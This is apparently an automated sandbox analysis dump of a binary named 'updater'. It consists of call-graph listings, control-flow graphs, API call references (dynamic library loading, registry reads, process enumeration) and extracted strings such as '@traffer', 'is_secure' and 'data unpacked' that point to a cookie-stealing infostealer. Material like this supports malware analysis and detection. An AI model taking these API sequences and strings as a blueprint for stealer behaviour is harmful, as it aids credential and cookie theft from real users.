ResetEvent 63783->64668 63785 13be4c7 63787 13b3174 45 API calls 63785->63787 63786->63785 64669 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63786->64669 63788 13be528 63787->63788 63789 13cdd77 18 API calls 63788->63789 63792 13be536 63789->63792 63791 13be7c0 63793 13cdf41 collate 18 API calls 63791->63793 63792->63791 63794 13b2e70 47 API calls 63792->63794 63796 13be567 63794->63796 63829 13be869 numpunct 63828->63829 63830 13b8f5d 36 API calls 63829->63830 63831 13be880 63830->63831 63832 13b8f5d 36 API calls 63831->63832 63833 13be895 63832->63833 63834 13ce8c7 19 API calls 63833->63834 63835 13be8b2 63834->63835 63836 13ce917 19 API calls 63835->63836 63837 13be8e1 63836->63837 63838 13cdf41 collate 18 API calls 63837->63838 63839 13be8fe 63838->63839 63840 13cdf41 collate 18 API calls 63839->63840 63841 13be909 63840->63841 63842 13cdf41 collate 18 API calls 63841->63842 63843 13be914 63842->63843 63844 13cdf41 collate 18 API calls 63843->63844 63845 13be91f 63844->63845 63846 13cdf41 collate 18 API calls 63845->63846 63847 13be92b 63846->63847 63848 13be98d 63847->63848 64673 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63847->64673 63854 13bea05 63848->63854 64674 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63848->64674 63851 13bea93 63852 13cbb72 20 API calls 63851->63852 63853 13bead0 63852->63853 63855 13ce917 19 API calls 63853->63855 63854->63851 64675 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63854->64675 63856 13beae3 63855->63856 63858 13cdf41 collate 18 API calls 63856->63858 63859 13beaf1 63858->63859 63860 13b3174 45 API calls 63859->63860 63861 13beb19 63860->63861 63862 13cdd77 18 API calls 63861->63862 63863 13beb2b 63862->63863 63884 13becc3 numpunct 63883->63884 63885 13b8f5d 36 API calls 63884->63885 63886 13bece2 63885->63886 63887 13b8f5d 36 API calls 63886->63887 63888 13becf5 63887->63888 63889 13ce8c7 19 API calls 63888->63889 63890 13bed10 63889->63890 63891 13ce917 19 API calls 63890->63891 63892 13bed3e 63891->63892 63893 13cdf41 collate 18 API calls 63892->63893 63894 13bed61 63893->63894 63895 13cdf41 collate 18 API calls 63894->63895 63896 13bed69 63895->63896 63897 13cdf41 collate 18 API calls 63896->63897 63898 13bed74 63897->63898 63899 13cdf41 collate 18 API calls 63898->63899 63900 13bed7f 63899->63900 63901 13cdf41 collate 18 API calls 63900->63901 63904 13bed8e 63901->63904 63902 13beded 63903 13ce917 19 API calls 63902->63903 63905 13bee3f 63903->63905 63904->63902 64677 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63904->64677 63907 13cdf41 collate 18 API calls 63905->63907 63910 13bee4c 63907->63910 63908 13beea3 63909 13b3174 45 API calls 63908->63909 63911 13bef08 63909->63911 63910->63908 64678 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63910->64678 63912 13cdd77 18 API calls 63911->63912 63916 13bef16 63912->63916 63914 13bf129 63915 13cdf41 collate 18 API calls 63914->63915 63917 13bf180 63915->63917 63916->63914 63918 13b2e70 47 API calls 63916->63918 63920 13bef44 63918->63920 63922 13cdd77 18 API calls 63920->63922 63947 13bf1ac numpunct 63946->63947 63948 13b8f5d 36 API calls 63947->63948 63949 13bf1cb 63948->63949 63950 13b8f5d 36 API calls 63949->63950 63951 13bf1de 63950->63951 63952 13ce8c7 19 API calls 63951->63952 63953 13bf1f9 63952->63953 63954 13ce917 19 API calls 63953->63954 63955 13bf227 63954->63955 63956 13cdf41 collate 18 API calls 63955->63956 63957 13bf24a 63956->63957 63958 13cdf41 collate 18 API calls 63957->63958 63959 13bf252 63958->63959 63960 13cdf41 collate 18 API calls 63959->63960 63961 13bf25d 63960->63961 63962 13cdf41 collate 18 API calls 63961->63962 63963 13bf268 63962->63963 63964 13cdf41 collate 18 API calls 63963->63964 63967 13bf277 63964->63967 63965 13bf2da 63966 13ce917 19 API calls 63965->63966 63968 13bf32c 63966->63968 63967->63965 64682 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63967->64682 63969 13cdf41 collate 18 API calls 63968->63969 63973 13bf339 63969->63973 63971 13bf390 63972 13b3174 45 API calls 63971->63972 63974 13bf3f5 63972->63974 63973->63971 64683 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63973->64683 63975 13cdd77 18 API calls 63974->63975 63978 13bf403 63975->63978 63977 13cdf41 collate 18 API calls 63979 13bf66d 63977->63979 63980 13b2e70 47 API calls 63978->63980 64001 13bf616 63978->64001 63982 13bf431 63980->63982 63983 13cdd77 18 API calls 63982->63983 64001->63977 64010 13bf699 numpunct 64009->64010 64011 13b8f5d 36 API calls 64010->64011 64012 13bf6b0 64011->64012 64013 13b8f5d 36 API calls 64012->64013 64014 13bf6c5 64013->64014 64015 13ce8c7 19 API calls 64014->64015 64016 13bf6e2 64015->64016 64017 13ce917 19 API calls 64016->64017 64018 13bf711 64017->64018 64019 13cdf41 collate 18 API calls 64018->64019 64020 13bf72e 64019->64020 64021 13cdf41 collate 18 API calls 64020->64021 64022 13bf739 64021->64022 64023 13cdf41 collate 18 API calls 64022->64023 64024 13bf744 64023->64024 64025 13cdf41 collate 18 API calls 64024->64025 64026 13bf74f 64025->64026 64027 13cdf41 collate 18 API calls 64026->64027 64028 13bf75b 64027->64028 64030 13bf7bd 64028->64030 64687 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 64028->64687 64036 13bf835 64030->64036 64688 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 64030->64688 64032 13bf8d1 64033 13cbb72 20 API calls 64032->64033 64034 13bf90e 64033->64034 64035 13ce917 19 API calls 64034->64035 64037 13bf924 64035->64037 64036->64032 64689 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 64036->64689 64038 13cdf41 collate 18 API calls 64037->64038 64040 13bf932 64038->64040 64041 13b3174 45 API calls 64040->64041 64042 13bf95d 64041->64042 64043 13cdd77 18 API calls 64042->64043 64044 13bf96f 64043->64044 64065 13bfb13 numpunct 64064->64065 64066 13b8f5d 36 API calls 64065->64066 64067 13bfb32 64066->64067 64068 13b8f5d 36 API calls 64067->64068 64069 13bfb45 64068->64069 64070 13ce8c7 19 API calls 64069->64070 64071 13bfb60 64070->64071 64072 13ce917 19 API calls 64071->64072 64073 13bfb8e 64072->64073 64074 13cdf41 collate 18 API calls 64073->64074 64075 13bfbb1 64074->64075 64076 13cdf41 collate 18 API calls 64075->64076 64077 13bfbb9 64076->64077 64078 13cdf41 collate 18 API calls 64077->64078 64079 13bfbc4 64078->64079 64080 13cdf41 collate 18 API calls 64079->64080 64081 13bfbcf 64080->64081 64082 13cdf41 collate 18 API calls 64081->64082 64084 13bfbde 64082->64084 64083 13bfc37 64085 13ce917 19 API calls 64083->64085 64084->64083 64691 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 64084->64691 64087 13bfc89 64085->64087 64088 13cdf41 collate 18 API calls 64087->64088 64089 13bfc96 64088->64089 64090 13b3174 45 API calls 64089->64090 64091 13bfce9 64090->64091 64092 13cdd77 18 API calls 64091->64092 64095 13bfcf7 64092->64095 64093 13bff0a 64094 13cdf41 collate 18 API calls 64093->64094 64096 13bff61 64094->64096 64095->64093 64097 13b2e70 47 API calls 64095->64097 64098 13cdf41 collate 18 API calls 64096->64098 64099 13bfd25 64097->64099 64100 13bff6c 64098->64100 64101 13cdd77 18 API calls 64099->64101 64104 13bfd2d 64101->64104 64126 13ccf35 64125->64126 64127 13cbdbf 64125->64127 64128 13cf6e3 _Deallocate 18 API calls 64126->64128 64127->62040 64128->64127 64129->62398 64131 13cbb7c _Yarn numpunct 64130->64131 64132 13cbba3 RegOpenKeyExA 64131->64132 64136 13cbbf7 64131->64136 64133 13cbbd1 RegGetValueA 64132->64133 64132->64136 64133->64136 64134 13cdf41 collate 18 API calls 64135 13cbc23 64134->64135 64137 13cdf41 collate 18 API calls 64135->64137 64136->64134 64138 13cbc2b 64137->64138 64138->63364 64139->63362 64140->63360 64576 13c659c numpunct 64575->64576 64577 13c65cf CreateToolhelp32Snapshot 64576->64577 64578 13c66f0 64576->64578 64577->64578 64584 13c65f5 64577->64584 64579 13cdf41 collate 18 API calls 64578->64579 64580 13c671a 64579->64580 64580->63517 64581 13cdf41 collate 18 API calls 64581->64584 64582 13c66d7 Process32Next 64582->64578 64582->64584 64584->64581 64584->64582 64585 13cdf41 collate 18 API calls 64584->64585 64587 13cedc4 19 API calls 64584->64587 64585->64582 64586->63504 64587->64584 64589 13b462e 64588->64589 64590 13b4690 EnterCriticalSection LeaveCriticalSection 64588->64590 64589->64590 64591 13b4644 InitializeCriticalSectionEx 64589->64591 64595 13b4bcb GetObjectA 64590->64595 64592 13b4680 64591->64592 64593 13b4666 GetLastError 64591->64593 64609 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 64592->64609 64593->64592 64596 13b4bec 64595->64596 64596->63555 64598 13cba10 64597->64598 64600 13cba46 64597->64600 64598->64600 64610 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 64598->64610 64600->63558 64609->64590 64610->64600 64615 13ca8b0 64614->64615 64619 13ca52e 64614->64619 64615->63570 64616 13ca597 LoadLibraryA 64616->64615 64624 13ca5cd 64616->64624 64618 13ca61a GetProcAddress 64623 13ca6a7 64618->64623 64630 13ca66f 64618->64630 64619->64616 64647 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 64619->64647 64622 13ca6bf GetProcAddress 64626 13ca728 64622->64626 64628 13ca6f2 64622->64628 64623->64622 64623->64623 64624->64618 64648 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 64624->64648 64625 13ca749 GetProcAddress 64651 13ca8b7 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 64625->64651 64626->64625 64626->64626 64628->64626 64650 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 64628->64650 64629 13ca760 64632 13ca767 GetProcAddress 64629->64632 64630->64623 64649 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 64630->64649 64635 13ca7c5 64632->64635 64641 13ca78d 64632->64641 64636 13ca7d0 GetProcAddress 64635->64636 64637 13ca83a GetProcAddress 64636->64637 64642 13ca804 64636->64642 64639 13ca8a4 FreeLibrary 64637->64639 64640 13ca871 64637->64640 64639->64615 64640->64639 64645 13ca899 64640->64645 64641->64635 64652 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 64641->64652 64642->64637 64653 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 64642->64653 64645->64615 64646->63570 64647->64616 64648->64618 64649->64623 64650->64626 64651->64629 64652->64635 64653->64637 64654->63598 64655->63605 64659->63661 64660->63683 64663->63724 64664->63730 64665->63726 64667->63777 64668->63786 64669->63785 64673->63848 64674->63854 64675->63851 64677->63902 64678->63908 64682->63965 64683->63971 64687->64030 64688->64036 64689->64032 64691->64083 64792 14152c7 64695->64792 64697 13c3e9c 64698 1415619 64697->64698 64804 1423676 64698->64804 64700 1415624 64700->62422 64756->62427 64757->62428 64758->62432 64759->62431 64793 14152d6 64792->64793 64794 14152eb 64792->64794 64803 1413529 18 API calls _Deallocate 64793->64803 64797 14152e6 __alldvrm 64794->64797 64798 141fda7 64794->64798 64797->64697 64799 141fa7f __strnicoll 5 API calls 64798->64799 64800 141fdc3 64799->64800 64801 141fdcc 64800->64801 64802 141fdde GetSystemTimeAsFileTime 64800->64802 64801->64797 64803->64797 64805 14205f2 _Deallocate 7 API calls 64804->64805 64806 142367e 64805->64806 64807 142255c std::_Locinfo::_W_Getdays 3 API calls 64806->64807 64810 142369c 64806->64810 64808 1423692 64807->64808 64809 1420123 _free 2 API calls 64808->64809 64809->64810 64810->64700 64870 141272a 64869->64870 64871 141273c 64869->64871 64895 140e56b GetModuleHandleW 64870->64895 64881 14125c3 64871->64881 64875 141272f 64875->64871 64896 14127c2 GetModuleHandleExW 64875->64896 64876 140e275 64876->62068 64882 14125cf _unexpected 64881->64882 64902 141703f EnterCriticalSection 64882->64902 64884 14125d9 std::locale::_Setgloballocale 64903 1412604 64884->64903 64887 1412780 64907 1420095 GetPEB 64887->64907 64890 14127af 64893 14127c2 std::locale::_Setgloballocale 3 API calls 64890->64893 64891 141278f GetPEB 64891->64890 64892 141279f GetCurrentProcess TerminateProcess 64891->64892 64892->64890 64894 14127b7 ExitProcess 64893->64894 64895->64875 64897 14127e1 GetProcAddress 64896->64897 64898 1412804 64896->64898 64901 14127f6 64897->64901 64899 141273b 64898->64899 64900 141280a FreeLibrary 64898->64900 64899->64871 64900->64899 64901->64898 64902->64884 64906 1417087 LeaveCriticalSection 64903->64906 64905 14125f2 64905->64876 64905->64887 64906->64905 64908 141278a 64907->64908 64909 14200af 64907->64909 64908->64890 64908->64891 64911 141fb02 64909->64911 64912 141fa7f __strnicoll 5 API calls 64911->64912 64913 141fb1e 64912->64913 64913->64908 64914 13e13a1 64915 13e13d6 64914->64915 64916 13e1411 64915->64916 64939 13dc537 44 API calls 64915->64939 64933 13df90c 64916->64933 64920 13d84b8 12 API calls 64921 13e1459 64920->64921 64923 13e14d5 64921->64923 64924 13e14a5 64921->64924 64940 13db78b 12 API calls 64923->64940 64926 13e342a 64924->64926 64932 13e14bb 64924->64932 64925 13e2a48 64929 13dfc8b 64926->64929 64942 13d0a7c 10 API calls _LStrxfrm 64926->64942 64941 13d66c2 LeaveCriticalSection 64929->64941 64930 13e3485 64931 13e8615 _strlen 64931->64932 64932->64929 64932->64930 64932->64931 64934 13df925 64933->64934 64935 13df920 64933->64935 64937 13d0929 6 API calls 64934->64937 64943 13dd7ac 13 API calls 64935->64943 64938 13df92f 64937->64938 64938->64920 64938->64929 64939->64916 64940->64929 64941->64925 64942->64929 64943->64934

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 13b3507-13b353d 1 13b353f-13b3551 call 140db91 0->1 2 13b3575-13b357b 0->2 1->2 10 13b3553-13b3574 call 140dfe8 call 140db47 1->10 4 13b357d 2->4 5 13b358c-13b35a1 LoadLibraryA 2->5 7 13b357f-13b358a 4->7 8 13b35a3-13b35ab call 13b39f5 5->8 9 13b35c2-13b35e8 5->9 7->5 7->7 19 13b35b9-13b35bd GetProcAddress 8->19 20 13b35ad 8->20 11 13b35ea-13b35fc call 140db91 9->11 12 13b3628-13b362e 9->12 10->2 11->12 31 13b35fe-13b3627 call 140dfe8 call 140db47 11->31 17 13b363f-13b364e LoadLibraryA 12->17 18 13b3630 12->18 21 13b36b8-13b36df 17->21 22 13b3650-13b366d call 13b3a64 call 13cd668 GetProcAddress call 13b3acf 17->22 25 13b3632-13b363d 18->25 19->9 26 13b35af-13b35b7 20->26 28 13b371b-13b3721 21->28 29 13b36e1-13b36f3 call 140db91 21->29 70 13b367b-13b368c GetProcAddress call 13b3b4c 22->70 71 13b366f 22->71 25->17 25->25 26->19 26->26 36 13b3723 28->36 37 13b3732-13b3744 LoadLibraryA 28->37 29->28 46 13b36f5-13b371a call 140dfe8 call 140db47 29->46 31->12 43 13b3725-13b3730 36->43 38 13b374a-13b3752 call 13b3c3d 37->38 39 13b37f0-13b380f 37->39 57 13b3760-13b37b0 GetProcAddress call 13b3cb4 call 13cd5da GetProcAddress call 13b3d2b call 13cd6f2 GetProcAddress call 13b3d9a 38->57 58 13b3754 38->58 47 13b384b-13b3851 39->47 48 13b3811-13b3823 call 140db91 39->48 43->37 43->43 46->28 51 13b3853 47->51 52 13b3862-13b3874 LoadLibraryA 47->52 48->47 73 13b3825-13b384a call 140dfe8 call 140db47 48->73 59 13b3855-13b3860 51->59 60 13b387a-13b3882 call 13b3e87 52->60 61 13b3930-13b3954 52->61 127 13b37be-13b37d4 GetProcAddress call 13b3e0a 57->127 128 13b37b2 57->128 67 13b3756-13b375e 58->67 59->52 59->59 85 13b3890-13b38e0 GetProcAddress call 13b3efd call 13cd4fa GetProcAddress call 13b3f68 call 13cd5c5 GetProcAddress call 13b3fdc 60->85 86 13b3884 60->86 65 13b398d-13b3993 61->65 66 13b3956-13b3968 call 140db91 61->66 78 13b39a2-13b39b4 LoadLibraryA 65->78 79 13b3995-13b39a0 65->79 66->65 92 13b396a-13b398c call 140dfe8 call 140db47 66->92 67->57 67->67 96 13b369a-13b36b3 GetProcAddress call 13b3bc6 call 13cd5da GetProcAddress 70->96 97 13b368e 70->97 77 13b3671-13b3679 71->77 73->47 77->70 77->77 88 13b39f0-13b39f4 78->88 89 13b39b6-13b39eb call 13b412b call 13cd5c5 GetProcAddress call 13b419f call 13cd5da GetProcAddress 78->89 79->78 79->79 138 13b38ee-13b392b GetProcAddress call 13b404b call 13cd5c5 GetProcAddress call 13b40bf call 13cd4e5 GetProcAddress 85->138 139 13b38e2 85->139 94 13b3886-13b388e 86->94 89->88 92->65 94->85 94->94 96->21 104 13b3690-13b3698 97->104 104->96 104->104 136 13b37e2-13b37eb GetProcAddress 127->136 137 13b37d6 127->137 131 13b37b4-13b37bc 128->131 131->127 131->131 136->39 140 13b37d8-13b37e0 137->140 138->61 141 13b38e4-13b38ec 139->141 140->136 140->140 141->138 141->141
                                    APIs
                                    • LoadLibraryA.KERNEL32(014552C4), ref: 013B3591
                                    • GetProcAddress.KERNEL32(00000000,00000000,?,00000008), ref: 013B35BB
                                    • LoadLibraryA.KERNEL32(01455268), ref: 013B3644
                                    • GetProcAddress.KERNEL32(00000000,00000000,?,00000008), ref: 013B365E
                                    • GetProcAddress.KERNEL32(00000000,00000000,?,00000008), ref: 013B367D
                                    • GetProcAddress.KERNEL32(00000000,00000000,?,00000008), ref: 013B369C
                                    • LoadLibraryA.KERNEL32(0145508C), ref: 013B3737
                                    • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B376D
                                    • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B3787
                                    • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B37A1
                                    • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B37C5
                                    • LoadLibraryA.KERNEL32(01454D40), ref: 013B3867
                                    • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B389D
                                    • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B38B7
                                    • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B38D1
                                    • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B38F5
                                    • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B390F
                                    • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B3929
                                    • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B37E9
                                      • Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
                                      • Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
                                      • Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB
                                    • GetProcAddress.KERNEL32(00000000,00000000,?,00000008), ref: 013B36B1
                                      • Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
                                      • Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9
                                    • LoadLibraryA.KERNEL32(0145543C), ref: 013B39A7
                                    • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B39CF
                                    • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B39E9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad$CriticalSection$EnterLeave$ConditionVariableWake
                                    • String ID: .$.$B.$JBB.$LM\W^Z
                                    • API String ID: 750888802-2939352088
                                    • Opcode ID: dfa602d174fa0fd23037ba2d8d1520586cd0f549e5db327d60a86a1b4678ba09
                                    • Instruction ID: ea7f6d9f83d1431182ec87f0ba3f79190c060d57e62e13a0b6826ac93fabf8bc
                                    • Opcode Fuzzy Hash: dfa602d174fa0fd23037ba2d8d1520586cd0f549e5db327d60a86a1b4678ba09
                                    • Instruction Fuzzy Hash: 4CD114759043919EDB21EFB9D8C45ADBFB1BB11214B29002EE6419FAB7FB70C884CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalDeallocateSection$EnterLeave__fread_nolock
                                    • String ID: $.$.$.$.$.$.$.$.$.$C$CLK\$FALSE$MEKJ$Mozilla$NULL,secure$[+] data unpacked$[-] data unpacked failed$[@^O$] - [user: $]KM[\K$cATGBBO.$is_secure$ru$secure$sqMAAEGK]
                                    • API String ID: 1177441120-1452042179
                                    • Opcode ID: 573e2ee1bd7bf1bffb8f899d7554ad3e36a0b6a7451a236b1a3fbc32ab910aa9
                                    • Instruction ID: 90086ece472dedea7b2ff208012c61dc1e0de122adfd884c1fe87ee5008d7d1f
                                    • Opcode Fuzzy Hash: 573e2ee1bd7bf1bffb8f899d7554ad3e36a0b6a7451a236b1a3fbc32ab910aa9
                                    • Instruction Fuzzy Hash: 4313D430D0429ADEDB15EBA8C844BEDBBB0BF65708F2041AED4456B1A2DB705F89CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 01412C70: QueryPerformanceCounter.KERNEL32(?), ref: 01412C8B
                                    • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 013C3EE2
                                    • GetModuleFileNameA.KERNEL32(00000000), ref: 013C3EE9
                                      • Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
                                      • Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9
                                      • Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
                                      • Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
                                      • Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB
                                      • Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeaveModule$ConditionCounterDeallocateFileHandleNamePerformanceQueryVariableWake
                                    • String ID: sec.$)$.$.$@traffer$hGBK$kmz{$mO\J$mac~{zk|`ock.$tMO]$|k$}ZKO$~
                                    • API String ID: 3852128730-2062050558
                                    • Opcode ID: e9b0ce1728aa425b80774e83ea240e44be02fba97e98b86f7395951651a9a0ff
                                    • Instruction ID: c4821a5ae8c7ab38acc03833f7db623f60e95e81ba1bd3582a2c7779f27d1936
                                    • Opcode Fuzzy Hash: e9b0ce1728aa425b80774e83ea240e44be02fba97e98b86f7395951651a9a0ff
                                    • Instruction Fuzzy Hash: 19231830D042969FDB15EBA8D854BEDBBB0AF65704F2440EED4486B1A2EB745F88CF41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1974 13bb653-13bb6a6 call 1430cfc 1977 13bb6a8-13bb6bb call 140db91 1974->1977 1978 13bb6dd-13bb6e3 1974->1978 1977->1978 1986 13bb6bd-13bb6dc call 13cd272 call 140dfe8 call 140db47 1977->1986 1979 13bb6e5 1978->1979 1980 13bb6f4-13bb73b call 13ce8c7 1978->1980 1982 13bb6e7-13bb6f2 1979->1982 1987 13bb73d-13bb750 call 140db91 1980->1987 1988 13bb772-13bb779 1980->1988 1982->1980 1982->1982 1986->1978 1987->1988 1999 13bb752-13bb771 call 13cd62a call 140dfe8 call 140db47 1987->1999 1990 13bb77b 1988->1990 1991 13bb78a-13bb7fc call 13ce8c7 call 13cfec9 call 13b3174 call 13cdd77 1988->1991 1994 13bb77d-13bb788 1990->1994 2015 13bb7fe-13bb82a call 13ce0ab call 13b8e25 1991->2015 2016 13bb844-13bb87f call 13cfec9 call 13b3174 call 13cdd77 1991->2016 1994->1991 1994->1994 1999->1988 2025 13bb839-13bb83f call 13cdf41 2015->2025 2026 13bb82c-13bb834 call 13ce143 2015->2026 2031 13bb8c2 2016->2031 2032 13bb881-13bb8c0 call 13ce0ab call 13b8e25 call 13cd9e5 call 13cdf41 2016->2032 2025->2016 2026->2025 2033 13bb8c4-13bb8d3 call 13cea7d 2031->2033 2032->2033 2040 13bb8d9-13bb8f9 2033->2040 2041 13bc1cc-13bc1e2 call 13cea7d 2033->2041 2044 13bb8fb-13bb90d call 140db91 2040->2044 2045 13bb935-13bb93c 2040->2045 2054 13bc1e8-13bc338 call 13b8f5d * 2 call 13ce8c7 call 13cfa3b call 13ce917 call 13cfa3b call 13cdf41 * 5 call 13ce0ab * 2 call 13b8dc6 call 13bc490 call 13cd2ae 2041->2054 2055 13bc452-13bc489 call 13cdf41 * 4 2041->2055 2044->2045 2061 13bb90f-13bb934 call 140dfe8 call 140db47 2044->2061 2047 13bb93e 2045->2047 2048 13bb94d-13bb95e call 13cd960 2045->2048 2052 13bb940-13bb94b 2047->2052 2048->2041 2062 13bb964-13bb983 2048->2062 2052->2048 2052->2052 2171 13bc33a-13bc34c call 140db91 2054->2171 2172 13bc378-13bc37f 2054->2172 2061->2045 2066 13bb9c2-13bb9c9 2062->2066 2067 13bb985-13bb997 call 140db91 2062->2067 2072 13bb9cb 2066->2072 2073 13bb9da-13bba17 call 13cd960 call 13cdfa2 call 13cda01 2066->2073 2067->2066 2085 13bb999-13bb9c1 call 140dfe8 call 140db47 2067->2085 2078 13bb9cd-13bb9d8 2072->2078 2102 13bba19-13bba2c call 140db91 2073->2102 2103 13bba51-13bba58 2073->2103 2078->2073 2078->2078 2085->2066 2102->2103 2114 13bba2e-13bba50 call 140dfe8 call 140db47 2102->2114 2105 13bba5a 2103->2105 2106 13bba69-13bbab6 call 13cd960 call 13cd8d6 2103->2106 2109 13bba5c-13bba67 2105->2109 2123 13bbaf8-13bbaff 2106->2123 2124 13bbab8-13bbaca call 140db91 2106->2124 2109->2106 2109->2109 2114->2103 2126 13bbb01 2123->2126 2127 13bbb10-13bbb93 call 13cea3d call 13ce917 call 13cd9e5 call 13cdf41 * 3 2123->2127 2136 13bbacc-13bbaf4 call 140dfe8 call 140db47 2124->2136 2137 13bbaf5 2124->2137 2130 13bbb03-13bbb0e 2126->2130 2162 13bbbd2-13bbbd9 2127->2162 2163 13bbb95-13bbba7 call 140db91 2127->2163 2130->2127 2130->2130 2136->2137 2137->2123 2167 13bbbdb 2162->2167 2168 13bbbea-13bbc27 call 13cd960 call 13cdfa2 call 13cda01 2162->2168 2163->2162 2177 13bbba9-13bbbd1 call 